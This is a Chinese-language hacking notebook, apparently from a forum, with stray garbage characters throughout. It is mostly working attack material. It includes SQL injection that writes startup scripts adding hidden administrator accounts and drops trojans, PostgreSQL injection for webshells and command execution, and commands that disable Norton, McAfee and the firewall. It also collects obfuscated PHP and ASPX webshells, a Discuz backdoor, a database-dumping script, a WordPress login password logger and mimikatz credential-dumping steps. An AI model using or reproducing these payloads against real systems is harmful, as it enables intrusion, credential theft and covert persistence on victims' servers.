: r# `) A8 [7 U4 Xinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
% c4 o4 O5 c. s1 Linsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );1 ?9 d7 u+ w3 l6 J: J2 a0 E( ?
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";& ]" m$ e* L( P
drop table a;
/ @! T K X! c" j( f' s3 u9 P2 |
8 a% ^0 A7 m8 q8 A7 l% l% B$ p英文版本:# R: }8 B% w; K% o$ A, ]' ?* d3 b4 _
' J6 C. H: }1 Q2 n7 }
use test;) m- Z0 P3 N8 ]2 [! m$ X1 n
create table a (cmd text);9 ]% o& ~) @0 e% B4 D- z) H/ u/ ~- l
insert into a values ("set wshshell=createobject (""wscript.shell"") " );5 q. J: M5 C& c" E
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
0 A1 m, `/ z$ w- x0 Ninsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );2 _5 {* D* W U8 j4 s
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
% a% I" \8 m/ e }( kdrop table a;
: V$ r' C2 G8 z$ `
& F+ }8 V: m& C- p) \9 o! Ncreate table a (cmd BLOB);
" {) X0 t! F% ?; U- finsert into a values (CONVERT(木马的16进制代码,CHAR));( f* \ c+ g- d+ I5 b
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
. ?6 [& g3 d% ]! n$ d. R2 D: odrop table a;
+ y) k x) B0 u; ]5 ]/ B! h+ X. H$ _$ Q7 s6 ]
记录一下怎么处理变态诺顿* z6 {0 L3 b' U' Z& O# m- h$ {
查看诺顿服务的路径
+ p5 B4 O& H4 x7 N2 z5 usc qc ccSetMgr
+ R N$ K3 E- j* i然后设置权限拒绝访问。做绝一点。。. i7 i+ o. z0 k0 G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
2 @) n8 R. F) c9 scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
+ V8 i: S$ Z; ^( o9 \" I2 `* icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
6 T9 l, ]) I6 R0 z9 \9 i- t+ L0 Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone) o$ y0 }# v+ p' |
6 Z" K5 {) @3 W3 y7 D
然后再重启服务器
0 j7 a) V+ B: _6 `. [5 r* B' A, i' n/ Piisreset /reboot$ D8 c) u( ~, t4 q @4 [$ V5 c
这样就搞定了。。不过完事后。记得恢复权限。。。。/ S/ ^3 P" n" I
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F" D& i. l, D2 x, P! v
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, h! A. g8 o& ^9 M+ ]
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F: K' [3 M- ^" l' j
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
1 j% i; t9 l# }SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin2 d! I; t. V% n* s
# ~8 D8 [1 M* _: mEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')4 I/ K2 f0 a: K( l- i1 d& R. j
+ t) i& s; G" ~1 ?4 ^+ c' M
postgresql注射的一些东西8 O6 q3 l7 E3 x4 O, p% q5 c
如何获得webshell
# |" H1 N$ b8 m$ e& Qhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ! Q8 ]! X4 v1 E* [* X, R7 f' n
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
, y! A" K7 l5 }# Q" P) Hhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
- A$ F& C) x$ ^/ D) E如何读文件
* w4 e g9 f' p7 @* d; }+ rhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);- U8 Y( @2 {0 }8 j$ c, Z* R8 {, m
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
) `' Z* ]! D' l) R3 whttp://127.0.0.1/postgresql.php?id=1;select * from myfile;* O/ V: `* Z, S) b9 n& P
5 e2 {4 U8 b$ i5 U$ p) r+ Cz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。6 j; J/ r! e. B: k4 N2 `
当然,这些的postgresql的数据库版本必须大于8.X6 }9 m" w& t) I5 W6 I4 s
创建一个system的函数:
* _( M' E- V7 kCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
4 z3 D3 m, ^% n/ p
) U; [ p/ M l, A8 w& K9 C c创建一个输出表:) m: l, H6 ~% {% @
CREATE TABLE stdout(id serial, system_out text)
; r) U* `4 P2 V* h: D
% y# A& L' ?" Y5 D' ]7 W执行shell,输出到输出表内:' _! e8 g4 Y4 a C! p; A Y/ e! ?7 }4 Z
SELECT system('uname -a > /tmp/test')* W5 D+ w* p2 X7 u
8 v& V2 I* q' Z4 v @
copy 输出的内容到表里面;) n; y5 @9 U, z' R( z0 ~ T
COPY stdout(system_out) FROM '/tmp/test'. _$ w$ ^/ N; _" {9 O/ w9 ?; g
" t5 t2 g: T; g从输出表内读取执行后的回显,判断是否执行成功
% w# g$ {" A* J) J! F6 z0 X* z1 \1 m
SELECT system_out FROM stdout* w, B) b% P- ~2 e2 b# a) |$ p
下面是测试例子
& B$ c$ f6 Q& N3 N* D+ j( v2 d1 Y; M* {% Q
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
8 ~: y6 S x9 y9 C# _0 e! s% S) v1 x$ ?
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
* t5 ^8 | I) \0 e6 C' ~7 ?. bSTRICT --$ F* f" K p8 k% ]3 d/ l; U" z
4 U. K% H8 v% m# @
/store.php?id=1; SELECT system('uname -a > /tmp/test') --/ v, }" Q4 V/ n6 t3 p
; [5 E7 z3 v9 }4 H) ~+ w/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --) k8 C- H5 r, e4 D) q
9 z8 h: I5 c b+ U! N/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
# i6 h6 X2 g5 o4 F: ynet stop sharedaccess stop the default firewall6 p: ~7 q a) g2 d4 v% P# F
netsh firewall show show/config default firewall
0 X1 l$ T$ S4 g3 b/ W( p" ^netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
) G3 k# i- o) j' d: e. Enetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
8 E+ J( A- p: Q8 Z( X. q/ {: v7 b修改3389端口方法(修改后不易被扫出)( E% \- F4 [, O. Q8 z, Q
修改服务器端的端口设置,注册表有2个地方需要修改1 r% q/ Z# b, J! E2 ~$ o4 v, ]' C& ]
; U, K s+ [! i0 ]+ g5 S, [2 n$ f[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
: P. R+ G, u3 ]PortNumber值,默认是3389,修改成所希望的端口,比如6000
5 M' M/ P4 X- P1 N& o1 n, I" G+ t; P, p' j. {$ N* |4 @
第二个地方:
: k8 v5 i! @; v4 Z! ^0 g[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
7 d8 J2 ~, d8 I2 wPortNumber值,默认是3389,修改成所希望的端口,比如6000
. C, a+ ?3 Z. t0 G7 s; I7 D2 C$ l9 U
现在这样就可以了。重启系统就可以了 |( O5 K. m# m) ^" y6 m- K
/ ^" W2 @4 O! |0 a8 [* L查看3389远程登录的脚本
5 q7 F: s) M c6 b% m( A, V( v) t保存为一个bat文件
- z% j' r6 F# b6 \date /t >>D:\sec\TSlog\ts.log
! {$ l [3 j) g0 S+ W( V" Otime /t >>D:\sec\TSlog\ts.log. L2 k3 T8 e/ K* p
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
5 x' F5 p0 I- q' ^start Explorer
# n8 R) S u4 [
! Q) U, P8 X8 L. H- xmstsc的参数:
( m" n' V. @' R; x" g
* a' c5 j4 F: \ z9 A远程桌面连接6 g9 S* p: J; K+ ]* E$ M# Z3 t7 _
- T0 C* ]# \5 a/ ]2 @$ uMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
9 O' ^0 B. L$ ?$ B9 e+ b* _* \! i [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
& b. i9 ^0 q) y0 }/ j5 b }+ A% m9 U5 |1 L
<Connection File> -- 指定连接的 .rdp 文件的名称。: h3 e; t$ i+ R x: p
+ d, T# ?* p& H5 K2 ?5 K0 V( K/v:<server[:port]> -- 指定要连接到的终端服务器。
' Y- d3 }* g% L3 H d8 t
! }' y) M. c8 s" [) Y! |/console -- 连接到服务器的控制台会话。
$ l7 Z& `! b; `1 T2 ^
1 j- C$ M2 R) g3 a3 E( X# D: w* m/f -- 以全屏模式启动客户端。
5 u6 Z( }9 w; d( O/ T# d1 e. I/ f' @! |- m4 C1 I
/w:<width> -- 指定远程桌面屏幕的宽度。; L0 b; m; t; L0 S3 _
4 Z! F* L4 Z7 V* q' N9 ]
/h:<height> -- 指定远程桌面屏幕的高度。
! l- |6 \* \* m: u2 y, O
0 k2 k0 q( i, ?3 X9 J/edit -- 打开指定的 .rdp 文件来编辑。
+ b3 E0 @3 R' E( [; o V0 S4 a9 p3 J( C9 z$ y
/migrate -- 将客户端连接管理器创建的旧版. E9 z# U5 |) n% U9 J/ {- M
连接文件迁移到新的 .rdp 连接文件。
8 ~) P( t% G: Z z [
$ m$ Z- N# \5 ]& b* q3 O2 O4 N$ N( ~( ?" n! _
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就( Z+ O5 }# a% ^
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
; M" \* F. v. k, k6 `+ P( z1 t1 M6 c! G4 J' `
命令行下开启3389
; C% K+ ]; ^) ~$ [, u8 L- i- {. wnet user asp.net aspnet /add
0 ^% b! {# v" E# `9 Tnet localgroup Administrators asp.net /add' B) G1 v( c k9 a
net localgroup "Remote Desktop Users" asp.net /add
$ `/ H$ z4 @; q$ k5 \, l& I+ mattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D% |, ^5 l4 X# _ ~
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
+ O6 Z7 q# _4 ]% w1 x7 S$ y4 aecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1: I" N Q2 j P& }
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
; z8 v F" m3 v8 y3 A& ~$ Vsc config rasman start= auto* q- L7 v! V1 e
sc config remoteaccess start= auto
; |7 m4 G( f$ |/ v8 inet start rasman
5 ]% F7 i4 I, E; h& E& gnet start remoteaccess
2 v0 B3 j" r5 A$ i7 L! a* X. xMedia
( G* d, m$ L7 F. @3 g) w; y/ ?/ R<form id="frmUpload" enctype="multipart/form-data", M- @6 h$ _. N1 N: K# U A
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
! V( { R! S8 _. E* h<input type="file" name="NewFile" size="50"><br>
$ f& S* x6 p- H6 l' ^7 k( Z<input id="btnUpload" type="submit" value="Upload">
$ L @: ~8 ^5 b/ r</form>" J! Q/ R' l6 C, w
6 S3 x5 l( M: e+ l
control userpasswords2 查看用户的密码
8 |% G9 I$ \! O% W8 caccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径1 O7 T6 ]6 v9 M8 V2 Z2 j) ~
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a* ?& G, g* n' J8 R9 g$ @
8 M0 v' s1 `+ S# }, @# k141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
* \+ I3 j* Y! b* H测试1:
+ f1 j: x O7 e; zSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t17 ?: _! {( ~" K, t" x, g
' n& ?, y% g' i4 j7 J: _# b( M9 x
测试2:) i' d- V% X8 l" d: a
+ o# s. G: J6 @# `create table dirs(paths varchar(100),paths1 varchar(100), id int): m3 H b4 h+ j) v# f
$ v1 @4 z3 q2 l) M" w
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
+ `1 [4 C6 H5 e' C: [. |! I
# W9 q6 F3 @2 d+ J1 R3 CSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1- W' K, m2 x3 k6 l9 U
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令0 W! g( J1 d/ u
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
+ S& B& [: ^. s: B& Y& [% vnet stop mcafeeframework% _0 w+ [+ L4 G5 j
net stop mcshield: D/ W* e% C( X* F
net stop mcafeeengineservice
4 v! x) q1 x# q, f- Anet stop mctaskmanager
( |4 `9 O: F/ x% [2 Qhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
0 j8 P' |3 M3 K- x
, ?# [% Y2 k" O& I, E! d VNCDump.zip (4.76 KB, 下载次数: 1) # o5 q* M: a( D" C3 e: q8 }
密码在线破解http://tools88.com/safe/vnc.php$ d3 s& e( W2 Y
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
9 V- ~6 F% U6 G" N0 H0 }
) r0 l7 x6 u" d v- ^( y6 d" ]; Uexec master..xp_cmdshell 'net user'9 x$ f; H8 S4 H5 g
mssql执行命令。' U6 x5 s; z# Q% [
获取mssql的密码hash查询
6 d6 E% z! l' O! ]2 C4 {9 hselect name,password from master.dbo.sysxlogins
. m9 {7 ^# E* y0 ]$ _' u# ~" W/ { K5 O( Y5 ]% E' S
backup log dbName with NO_LOG;" H H% b9 C6 R) `* p5 u. n! H
backup log dbName with TRUNCATE_ONLY;
. l6 j. x- g8 o3 g0 cDBCC SHRINKDATABASE(dbName);
0 v8 _. G+ M4 m/ [' ^% bmssql数据库压缩
7 V% d4 m6 f% w/ K9 Q; X- I! `
* h2 ?$ H1 r8 n4 H2 |Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
) e3 u) @2 q' o# ~将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
1 r" Y; n. c; ~/ Z `! Q* W7 n- s; x0 v" l4 R- J6 A
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'8 N2 O% Z2 [( e+ X4 t
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak0 g2 H; F, h1 K# H7 r6 Y% i8 e: E2 n6 s
6 \+ \1 M. D$ sDiscuz!nt35渗透要点:
0 `) T+ z1 C6 `7 ](1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
4 v0 L: S# b+ t% U% ~(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>* J9 w! l6 W2 u% d _, P
(3)保存。* n6 w# N% A* h1 R' E0 `" Q
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass# s* b2 j) M8 G' L9 j1 ~! u
d:\rar.exe a -r d:\1.rar d:\website\; V! h7 Y) }" V( K8 H
递归压缩website4 V' }( j" W. c3 d9 n: x3 a- f0 _
注意rar.exe的路径
, k$ M8 R, j( M" i( {) C. ]
4 a' X; v- u2 I<?php
- l1 u6 e) y9 A; y' S/ `3 a+ n: w: `3 q% H& z7 k/ ~
$telok = "0${@eval($_POST[xxoo])}";% a: g$ Y& \2 W: p
3 W# q) g' N I$ Q/ A1 s: u( p$username = "123456";9 C. t2 n. [1 o: i0 f+ M
& h& `6 x0 ]( I% z- M+ n1 n7 A$userpwd = "123456";" h: Z9 L1 h5 ~2 A
: w2 l8 G& B1 z+ M$telhao = "123456";
" g- g% T6 d) V+ b! n5 g% {% n- q# o& b0 g* |# m& Q7 K2 f/ C: g- j s
$telinfo = "123456";( J$ q# e2 @* U3 `* A% Q: B" ?2 Z
( d3 q) t* n4 ]; i5 @) l?>9 E( Z% G% B3 f7 Y0 P* }. h
php一句话未过滤插入一句话木马
9 O2 t3 J$ A' s: \$ A& Z1 `# B
+ v4 z% D8 Z' ^, \ L- k站库分离脱裤技巧; V5 a9 v) C- t8 j
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
1 t/ i, L1 }4 bexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'/ A" ^5 W, o0 e+ d1 U0 C
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。7 ~; G5 |& i+ f, o; x7 \
这儿利用的是马儿的专家模式(自己写代码)。
8 K1 X; k$ w" Rini_set('display_errors', 1);0 A6 Y9 N: p4 F, Y& r
set_time_limit(0);
! ^) ~7 _0 U$ }. M+ N$ ?% v5 zerror_reporting(E_ALL);
" G$ K% \0 f" q$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
6 e0 s" o4 R9 k2 _mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());/ H, b2 f: Q' R2 Y b+ M# W2 g
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
8 ^$ o& }! N4 X$ j0 e$i = 0;
5 z( g) i+ N7 S' V$tmp = '';5 z! r( ^% ~# r9 |+ e# R
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {) r4 i, X' Y8 s, ]8 ^
$i = $i+1;( t+ M, n% w8 K5 p) C8 Z6 V, v
$tmp .= implode("::", $row)."\n";, D# z+ }7 l5 ?# h: }, s8 v. I
if(!($i%500)){//500条写入一个文件
" z" S6 L9 r4 x9 Z $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
4 a* f7 @+ V: N5 d, s) A3 n& I- p& R file_put_contents($filename,$tmp);
m p1 ^$ h0 R5 b- N4 G* ~ $tmp = '';( @3 `7 X( k9 i; }$ \
}
6 [3 Q; I! Y" v& G" H0 r# r}* D' B! @! G& r$ c' ]4 N
mysql_free_result($result);
2 M8 |8 X9 s5 Q6 X3 H; u6 [; v% A r' J8 @4 E8 {3 Z
) r- O$ e5 l& ]8 @
: U% Z8 e/ G5 L; y, s4 U
//down完后delete3 _+ [9 `8 ]8 M9 Z) x% \; k
3 V- Z( z$ N* _0 t1 I
% h/ r8 P' G$ x) Hini_set('display_errors', 1);
# e+ {! {5 p! G f& z% ^; L8 zerror_reporting(E_ALL);- N" a9 c2 c$ t+ w, U" b4 b1 g/ d
$i = 0;
3 l% w% f# ]; ]while($i<32) {
# c# Q# r E T! L- U $i = $i+1;
# R j) v$ T N# b $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';' c# p9 R) J6 x! l9 v' p
unlink($filename);
+ o/ f) x: O4 m. Z+ k$ o; l} , y5 q, L: i5 R
httprint 收集操作系统指纹
" D$ w* ]% x7 |, J# X- W3 p扫描192.168.1.100的所有端口
3 }( y+ c5 M& k+ Nnmap –PN –sT –sV –p0-65535 192.168.1.100
: L$ e1 e. F# F* b* S" n/ [* F! ~host -t ns www.owasp.org 识别的名称服务器,获取dns信息
0 r* E3 a2 W; O4 x* k* Thost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
* p7 b7 l$ b8 ^+ G3 d. F ~3 P) eNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host2 @/ f( G/ \# p6 R% [8 }" C
& W6 `5 C% a A8 J8 W, _8 U4 {Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
9 p' N/ }8 E, c- D w! v( Y8 M" E. h3 d
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)& d7 K3 [1 B$ J/ \7 A1 Q$ i
" t' {& W" w/ [2 { Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x, d. ~$ L2 c3 j9 M) a% W
& c- J3 I7 {$ z/ G
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
' {. ?/ r' _5 d+ t; P$ ?
. R" w* O0 K7 W& q http://net-square.com/msnpawn/index.shtml (要求安装) }: f) T" e% ?1 `2 J. q7 Q
/ D8 s, q+ y' V+ d
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)& j" z$ Q! W* I: l* b v
. K% B& e8 h: @) @4 N# _) s SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)8 Q' _" C! s/ c# c) w+ i
set names gb2312+ {' q% s" e" y
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。6 h5 F4 R8 v5 [
- c _/ Z3 j% N/ \ X3 d: y$ @: p
mysql 密码修改
7 I6 E+ X6 x, E) Y& u/ x, v" jUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” . B( \, I2 _# s/ C
update user set password=PASSWORD('antian365.com') where user='root';( ^3 u, ?& e* e9 R/ A
flush privileges;5 A8 F; K/ E( z3 a+ i
高级的PHP一句话木马后门
$ ]; W, C8 t& u3 h, `+ v1 r) l/ B, B- @3 b. \8 s1 D3 l. }
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀5 V/ }0 D* l% }
% q8 m& [% P4 D( s/ g% @: d" Z0 v
1、& B9 o/ O3 L" s: D8 D" e: [
0 s) I- b; c! D/ ^3 P5 o: |& Y
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";. E9 h2 R o) P
8 V( p( n. E) @$hh("/[discuz]/e",$_POST['h'],"Access");
5 r: e3 ~$ _3 ] w' H5 n
8 A4 S% [: P; V ^7 \6 U//菜刀一句话' ?1 ?* n" b7 h4 C
% {: G9 C* s" a" ]
2、
# Z) k0 Y4 m g, g/ O8 x- _0 ^* g$ t. h- i* P/ ]
$filename=$_GET['xbid'];
7 O( F+ J0 \5 t9 o6 _& z: w; [. h( |# U7 K2 T
include ($filename);4 a. p. |: ?8 Z7 m0 m% s- n
" O% w# Y% Q5 `- ?3 @
//危险的include函数,直接编译任何文件为php格式运行
6 x e3 ^% i5 v5 ]) R: W: ]0 i. c+ s1 W1 f1 X; ~6 w
3、
$ K% C: t# O- a7 k$ q% C+ e! C/ t: H N; N) |
$reg="c"."o"."p"."y";7 H% H. I, C2 I. E# U# p
% f9 V/ v& @2 A' Z, Q" i
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
5 q' x/ t4 [% A# h F3 A& P6 A0 Z8 J! X$ ]: f' b( T6 o
//重命名任何文件7 j- V( Y: Y' a, m {; s+ W
7 \% P8 ?4 M6 |! ?
4、2 z# u3 G1 k! Q/ F& Q
0 t9 K, [* R. m% N$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";7 }) m, z6 x' C; v2 k! K
% ~! {% ?( A; {) s2 H" K
$gzid("/[discuz]/e",$_POST['h'],"Access");
& C( `: V! k9 T5 Z% d z8 V7 H+ a' }0 K2 J% e) p6 T a( h
//菜刀一句话
5 I6 g1 U$ h* R
4 A: Z5 L8 ?7 f7 X( |+ _5、include ($uid);
4 D* l' q$ g8 u/ G. m0 h+ p/ g5 r `+ y/ e
//危险的include函数,直接编译任何文件为php格式运行,POST
$ X+ A# v5 l/ A/ ^% Z' m, g) U t
% _$ w' X& [1 G4 |1 e9 P% H9 C* G
//gif插一句话
" i2 E, d P' R8 z2 d( I" h Y0 f& J1 U. t9 E* j; d1 }6 t
6、典型一句话6 M5 W5 E0 m; |# E" z% A0 C
) @0 _2 P. H: P程序后门代码
9 z& I/ ^3 `+ q4 b" K$ u" D+ m<?php eval_r($_POST[sb])?>1 C" ^4 \* Z+ l, X* E: ^, J1 e
程序代码2 L: I. S/ i3 m Y g" U
<?php @eval_r($_POST[sb])?>; o4 }9 Y2 K1 A0 v5 Z+ f9 M
//容错代码6 F2 h( q& U# J; H: ~9 F) M M4 Z2 R
程序代码
; c% Z/ g7 [% o2 H6 q<?php assert($_POST[sb]);?>
& B* ~$ @! P* ~9 [3 [ w7 F//使用lanker一句话客户端的专家模式执行相关的php语句8 G. J, p7 B0 J( ^
程序代码3 ?/ _% c* |8 J+ D' {: C
<?$_POST['sa']($_POST['sb']);?>
r1 n4 F9 m9 v) m M. T程序代码
6 G2 A: H( _. \7 a' @% e8 ~<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
/ g v' w8 j6 E" m# p程序代码
+ j$ u3 `# g0 G, x8 {: v- _<?php, |. m" R% ?2 a: x4 @- o# B
@preg_replace("/[email]/e",$_POST['h'],"error");2 z' M0 q# W q8 I; \6 W* u/ M
?># v; H% r% G' ]1 [; U' b/ ~
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
- p; ]) [4 C' A/ C0 c程序代码
* Y; w8 ?4 T- ?% I( W4 w) y<O>h=@eval_r($_POST[c]);</O>% {) ~2 }; u- O/ S7 j* i3 K
程序代码
x! c: p" p2 P& s/ f<script language="php">@eval_r($_POST[sb])</script>5 G- E# ?+ R/ Z. D, t1 X+ U/ |
//绕过<?限制的一句话5 G2 Y7 s) z7 p% i n, w3 ~
" L$ K8 d- f$ \0 Whttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip' ]) a/ w) i- u- ^2 O% x% l& C' o
详细用法:
?2 y2 F N8 y+ J1、到tools目录。psexec \\127.0.0.1 cmd9 W! \9 |+ `/ w9 \: [
2、执行mimikatz
, ]1 n( }- k7 K4 Y5 o: s/ L9 }$ `3、执行 privilege::debug+ g4 P/ g/ S c* X
4、执行 inject::process lsass.exe sekurlsa.dll2 F, |3 a! j) {7 y5 x. x) @6 ]9 G
5、执行@getLogonPasswords
7 n# G$ W4 R6 ~6 Y, n6、widget就是密码1 }9 Y' I) U# n, l
7、exit退出,不要直接关闭否则系统会崩溃。
3 t) L- V* k- L% [" t
4 ^! Z3 Y/ N" r$ B9 \7 g- lhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面* y4 M& v3 _3 m6 W' n0 }. K; J1 L
g& ~9 ~! H" t( I5 n; e9 o. r2 n! m自动查找系统高危补丁* w$ ?0 {1 K) x# C1 H, G
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
5 E' R: z G0 ~. B3 o* v; }
0 ?2 v/ M- ]7 m" N2 w+ t突破安全狗的一句话aspx后门/ @1 f/ O) W* U1 t
<%@ Page Language="C#" ValidateRequest="false" %>( D8 M. F1 d8 U# d% }
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%># n6 n7 y+ j& Q: [+ U
webshell下记录WordPress登陆密码
0 H7 Q, [5 c: \9 A- Q6 c8 L/ F: Z" bwebshell下记录Wordpress登陆密码方便进一步社工
; M. ~/ j# T6 P( i# S: w在文件wp-login.php中539行处添加:* x( q# n# U& @% g) I; j
// log password: _( V" Z: q( O) N4 f, r' Z
$log_user=$_POST['log'];
9 s; u4 j. U, F2 ?. T! O* {/ ]$log_pwd=$_POST['pwd'];
: _% f' {& t. H# D6 p$log_ip=$_SERVER["REMOTE_ADDR"];
. V& W; b" Y4 ^. B$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
! R6 r' q" M% [8 `% W& W+ M$txt=$txt.”\r\n”;
! g4 t: J7 N( g2 p+ o6 E5 r6 vif($log_user&&$log_pwd&&$log_ip){, W( y; l" E( M* \3 w. u9 _# I
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);/ w- \7 x4 w2 b, e# {- o( F8 O8 |
}* y# R$ _) u+ @: w
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
* |+ S. ?6 p# I: j |$ ?就是搜索case ‘login’- {1 k8 A6 ^+ h- j% K2 N% r; | `
在它下面直接插入即可,记录的密码生成在pwd.txt中,
. {" n5 H' F' c" N其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
